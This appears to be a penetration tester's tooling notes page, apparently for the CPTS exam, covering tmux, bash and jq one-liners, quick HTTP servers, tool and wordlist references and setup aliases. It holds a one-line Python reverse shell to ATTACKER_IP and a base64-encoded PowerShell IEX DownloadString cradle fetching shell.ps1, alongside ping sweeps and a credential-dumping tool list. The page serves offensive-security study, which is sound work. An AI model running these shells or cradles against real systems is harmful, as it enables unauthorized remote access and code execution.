Pentest_Notes

🧰 Miscellaneous / General Tooling

Organized notes for general tools, tmux, useful scripts, and productivity. Last Updated: 2026-03-27


Tmux

Overview

Tmux is a terminal multiplexer — essential for penetration testing. It allows multiple terminal sessions within a single window, session persistence, and logging.

Essential Keybindings

Default prefix: Ctrl+b (common custom: Ctrl+a)

| Action | Keybinding |
|---|---|
| New session | tmux new -s <name> |
| Detach | prefix + d |
| Reattach | tmux attach -t <name> |
| List sessions | tmux ls |
| New window | prefix + c |
| Next window | prefix + n |
| Previous window | prefix + p |
| Split horizontal | prefix + " |
| Split vertical | prefix + % |
| Toggle panes | prefix + o |
| Kill pane | prefix + x |
| Kill window | prefix + & |
| Rename window | prefix + , |
| Rename session | prefix + $ |
| Resize pane | prefix + Alt+Arrow |
| Scroll mode | prefix + [ |
| Zoom pane (toggle) | prefix + z |
| Copy mode | prefix + [ → select → prefix + ] |

Tmux Logging Plugin

# Install tmux plugin manager
git clone https://github.com/tmux-plugins/tpm ~/.tmux/plugins/tpm

# Add to ~/.tmux.conf:
set -g @plugin 'tmux-plugins/tmux-logging'

# Install plugins: prefix + I

# Logging keybindings:
# prefix + Shift+P     → Toggle logging (current pane)
# prefix + Alt+Shift+P → Save complete history
# prefix + Alt+p       → Screenshot current pane

⚠️ CPTS Exam Tip: Enable tmux logging IMMEDIATELY at the start of the exam. This captures every command and output as evidence.
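A plugin-free fallback for the same evidence capture, added here as an example (not part of the original notes): tmux's built-in pipe-pane appends everything a pane prints to a timestamped file, so logging works even on a box where TPM is not installed. Assumes you run it from inside tmux; the log directory (~/pentest-logs) and file naming scheme are my own choices.

```shell
#!/usr/bin/env bash
# Plugin-free pane logging with tmux's built-in pipe-pane.
# Assumption: called from inside a tmux session; default log dir is ~/pentest-logs.

# Make a session/window name safe for a file name (tmux allows '/' and spaces in names).
safe_name() { printf '%s' "$1" | tr -c 'A-Za-z0-9_.-' '_'; }

# Build a unique log path: <dir>/<session>-w<window>-p<pane>-<timestamp>.log
# args: dir session window pane timestamp
log_path() {
  printf '%s/%s-w%s-p%s-%s.log' "$1" "$(safe_name "$2")" "$3" "$4" "$5"
}

# Start appending the current pane's output to a fresh, timestamped log file.
start_pane_log() {
  local dir=${1:-$HOME/pentest-logs} path
  mkdir -p "$dir"
  path=$(log_path "$dir" "$(tmux display -p '#S')" "$(tmux display -p '#I')" \
                  "$(tmux display -p '#P')" "$(date +%Y%m%d-%H%M%S)")
  # pipe-pane feeds pane output to the shell command; -o means a second call
  # closes the existing pipe instead of opening another one.
  tmux pipe-pane -o "cat >> '$path'"
  printf 'logging pane to %s\n' "$path"
}

# Stop logging the current pane (pipe-pane with no command closes the pipe).
stop_pane_log() { tmux pipe-pane; }
```

Source the file in each new pane and call start_pane_log; the timestamp in the name means re-enabling never overwrites earlier evidence.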

Example ~/.tmux.conf

# Set prefix to Ctrl+a
unbind C-b
set -g prefix C-a
bind C-a send-prefix

# Enable mouse
set -g mouse on

# Start window numbering at 1
set -g base-index 1
setw -g pane-base-index 1

# Increase scrollback
set -g history-limit 50000

# Plugins
set -g @plugin 'tmux-plugins/tpm'
set -g @plugin 'tmux-plugins/tmux-logging'
set -g @plugin 'tmux-plugins/tmux-resurrect'

# Initialize TPM
run '~/.tmux/plugins/tpm/tpm'

Useful Bash One-Liners

IP Address Extraction

# Extract IPs from a file
grep -oE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])' FILE

# Alternative
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' FILE
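The two patterns above do not behave the same on messy input. The following is an added example (not from the original notes) that runs both over a constructed sample and shows the difference, plus a word-bounded variant: the strict pattern rejects 256.256.256.256 but still cuts 99.1.1.1 out of 999.1.1.1 and 192.168.1.30 out of 192.168.1.300, while the loose one accepts them verbatim. Assumes GNU grep (for -w handling) and a POSIX sort and paste.

```shell
#!/usr/bin/env bash
# Constructed sample input: valid addresses mixed with look-alikes.
SAMPLE='host 10.10.10.5 up
bogus 999.1.1.1 and 256.256.256.256
version 1.2.3.4.5 then 10.10.10.254
trailing 192.168.1.300'

# Strict octet pattern from the notes (0-255 per octet), sorted and comma-joined.
strict_ips() {
  printf '%s\n' "$1" \
    | grep -oE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])' \
    | LC_ALL=C sort -u | paste -sd, -
}

# The "alternative" pattern: any 1-3 digits per octet, so 999.1.1.1 is accepted.
loose_ips() {
  printf '%s\n' "$1" \
    | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' \
    | LC_ALL=C sort -u | paste -sd, -
}

# Strict pattern with -w: a match may not touch other word characters, so
# 99.1.1.1 is no longer carved out of 999.1.1.1 and 192.168.1.30 is not carved
# out of 192.168.1.300. A dot is not a word character, so 1.2.3.4 still comes
# out of 1.2.3.4.5; review hits by hand before feeding them to a scanner.
bounded_ips() {
  printf '%s\n' "$1" \
    | grep -owE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])' \
    | LC_ALL=C sort -u | paste -sd, -
}
```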

Subnet Loop Operations

# Loop through /24 subnet
for ip in $(seq 1 254); do echo "10.10.10.$ip"; done

# Quick ping sweep
for ip in $(seq 1 254); do (ping -c 1 10.10.10.$ip | grep "64 bytes" &); done

# Banner grab across subnet (use printf, not a here-string: bash does not turn \r\n into real CRLFs inside quotes)
for ip in $(cat online); do echo "===$ip==="; printf 'HEAD / HTTP/1.0\r\n\r\n' | nc -w 1 -nv "$ip" 80 2>&1 | head -5; done

File Operations

# Find files modified in last 60 minutes
find / -type f -mmin -60 2>/dev/null

# Find files by extension
find / -type f -name "*.conf" 2>/dev/null

# Sort and deduplicate
sort -u file.txt > file_unique.txt

# Count lines in file
wc -l file.txt

# Compare two files
diff file1.txt file2.txt
comm -23 <(sort file1.txt) <(sort file2.txt)

Text Processing

Grep Tricks

# Recursive search with context
grep -rn "password" /path/ --include="*.conf" -C 2

# Case-insensitive
grep -i "password" file.txt

# Inverse match (exclude)
grep -v "comment\|#" file.txt

# Count matches
grep -c "pattern" file.txt

# Only filenames
grep -rl "password" /path/

Awk & Sed

# Extract specific column
awk '{print $2}' file.txt

# Extract field with custom delimiter
awk -F: '{print $1}' /etc/passwd

# Replace text in file
sed -i 's/old/new/g' file.txt

# Remove blank lines
sed '/^$/d' file.txt

# Print specific line range
sed -n '10,20p' file.txt

Jq (JSON Processing)

# Pretty print
jq '.' file.json

# Extract specific field
jq '.users[].name' file.json

# Filter by condition
jq '.[] | select(.status == "active")' file.json

# BloodHound JSON — extract descriptions
jq '.data[] | select(.Properties.description != null) | {name: .Properties.name, desc: .Properties.description}' domain_users.json

Python Utilities

Quick HTTP Server

# HTTP server (serves current directory)
python3 -m http.server 80

# HTTPS server (self-signed cert.pem/key.pem in the current directory)
# ssl.wrap_socket() was removed in Python 3.12, so build an SSLContext instead
python3 -c "
import http.server, ssl
server = http.server.HTTPServer(('0.0.0.0', 443), http.server.SimpleHTTPRequestHandler)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(certfile='cert.pem', keyfile='key.pem')
server.socket = ctx.wrap_socket(server.socket, server_side=True)
server.serve_forever()
"

# Upload server
python3 -m uploadserver 80

Quick Script Runner

# One-liner Python reverse shell (for quick testing)
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

Precompiled Binaries & Tools

Binary Repositories

| Repository | URL | Contents |
|---|---|---|
| jakobfriedl's precompiled | https://github.com/jakobfriedl/precompiled-binaries | Common Windows tools |
| SharpCollection | https://github.com/Flangvik/SharpCollection | .NET offensive tools |
| Static Binaries | https://github.com/andrew-d/static-binaries | Static-linked Linux tools |

Common Tools to Have Ready

| Tool | Purpose | Transfer Method |
|---|---|---|
| LinPEAS | Linux enumeration | HTTP download |
| WinPEAS | Windows enumeration | HTTP/SMB download |
| pspy64 | Linux process monitor | HTTP download |
| SharpHound.exe | BloodHound collection | HTTP/SMB download |
| Rubeus.exe | Kerberos attacks | HTTP/SMB download |
| Mimikatz.exe | Credential dumping | HTTP/SMB download |
| Seatbelt.exe | Windows enumeration | HTTP/SMB download |
| PowerUp.ps1 | Windows privesc | HTTP download |
| PowerView.ps1 | AD enumeration | HTTP download |
| Snaffler.exe | File discovery | HTTP/SMB download |
| Ligolo-ng agent | Pivoting | HTTP/SMB download |
| Chisel | Pivoting/tunneling | HTTP download |
| nc.exe / ncat.exe | Reverse shell | HTTP/SMB download |
| socat | Bidirectional relay | HTTP download |

Wordlist Reference

Common Wordlist Locations

/usr/share/wordlists/rockyou.txt
/usr/share/seclists/
/opt/SecLists/

SecLists Most-Used Paths

| Purpose | Path |
|---|---|
| Directory brute-force | Discovery/Web-Content/directory-list-2.3-medium.txt |
| File names | Discovery/Web-Content/raft-large-files.txt |
| Words | Discovery/Web-Content/raft-large-words.txt |
| DNS subdomains | Discovery/DNS/subdomains-top1million-110000.txt |
| Usernames | Usernames/xato-net-10-million-usernames.txt |
| Top usernames | Usernames/top-usernames-shortlist.txt |
| Name-based usernames | Usernames/Names/names.txt |
| Parameters | Discovery/Web-Content/burp-parameter-names.txt |
| XSS payloads | Fuzzing/XSS/XSS-BruteLogic.txt |
| Command injection | Fuzzing/command-injection-commix.txt |
| Special characters | Fuzzing/special-chars.txt |
| Community strings | Discovery/SNMP/common-snmp-community-strings.txt |

Nifty Tricks

/etc/hosts Management

# Add hostname
echo "<IP> hostname.domain.com hostname" | sudo tee -a /etc/hosts

# Quick add multiple hosts
sudo sh -c 'cat >> /etc/hosts << EOF
10.10.10.1  dc01.domain.com dc01
10.10.10.2  web01.domain.com web01
10.10.10.3  db01.domain.com db01
EOF'
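Appending with tee -a or a heredoc leaves stale duplicates behind when a host's IP changes mid-engagement, and the first matching line wins. The following is an added example (not from the original notes) of an idempotent add_host that replaces an existing entry for the same hostname instead of appending a second one; it takes the file as an argument so it can be tested on a scratch copy and run against /etc/hosts via sudo. Assumes GNU or BSD grep, sed and awk.

```shell
#!/usr/bin/env bash
# add_host FILE IP FQDN [SHORT]: add or update a hosts entry without duplicates.
# In practice: sudo bash -c 'source hosts.sh; add_host /etc/hosts 10.10.10.1 dc01.domain.com'
add_host() {
  local file=$1 ip=$2 fqdn=$3 short=${4:-${3%%.*}}
  local entry="$ip  $fqdn $short"
  # Escape dots so the hostname is matched literally, bounded by whitespace or end of line;
  # ^[^#]* keeps commented-out lines from matching.
  local esc; esc=$(printf '%s' "$fqdn" | sed 's/[.]/\\./g')
  local pat="^[^#]*[[:space:]]$esc([[:space:]]|\$)"
  if grep -qE "$pat" "$file"; then
    # Stale entry for this name: drop it, then re-add below with the new IP.
    # Writing through 'cat >' keeps the inode, which matters when /etc/hosts is bind-mounted.
    grep -vE "$pat" "$file" > "$file.tmp" || :   # exit 1 only means nothing was left
    cat "$file.tmp" > "$file" && rm -f "$file.tmp"
  fi
  printf '%s\n' "$entry" >> "$file"
}

# host_ip FILE FQDN: print the IP currently mapped to FQDN (empty if none).
host_ip() {
  local esc; esc=$(printf '%s' "$2" | sed 's/[.]/\\./g')
  grep -E "^[^#]*[[:space:]]$esc([[:space:]]|\$)" "$1" | awk 'NR==1{print $1}'
}
```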

Screen / Terminal Management

# Screen sessions
screen -list        # List sessions
screen -S pentest   # Create named session
screen -d -r pentest # Reattach

# List tmux sessions from inside screen (or screen sessions from inside tmux with screen -list)
tmux ls

Quick Encoding / Decoding

# Base64 encode
echo -n 'text' | base64

# Base64 decode
echo 'dGV4dA==' | base64 -d

# URL encode
python3 -c "import urllib.parse; print(urllib.parse.quote('test string'))"

# URL decode
python3 -c "import urllib.parse; print(urllib.parse.unquote('test%20string'))"

# PowerShell Base64 for commands (UTF-16LE required)
echo -n 'IEX(New-Object Net.WebClient).DownloadString("http://10.10.10.1/shell.ps1")' | iconv -t utf-16le | base64 -w 0

Checking for Connectivity

# Listener to verify reverse connection
sudo tcpdump -i tun0 icmp

# On target:
ping -c 1 <ATTACKER_IP>

Environment Variables (Attacker Setup)

# Useful aliases and variables to set at the start of engagement
export TARGET=10.10.10.10
export DC=10.10.10.1
export DOMAIN=domain.com
export SECLIST=/usr/share/seclists
export ATTACKER_IP=$(ip addr show tun0 | grep 'inet ' | awk '{print $2}' | cut -d/ -f1)

# Add to ~/.bashrc for persistence
alias serve='python3 -m http.server 80'
alias listen='rlwrap nc -lnvp'

Common Pitfalls / Gotchas

References & Further Reading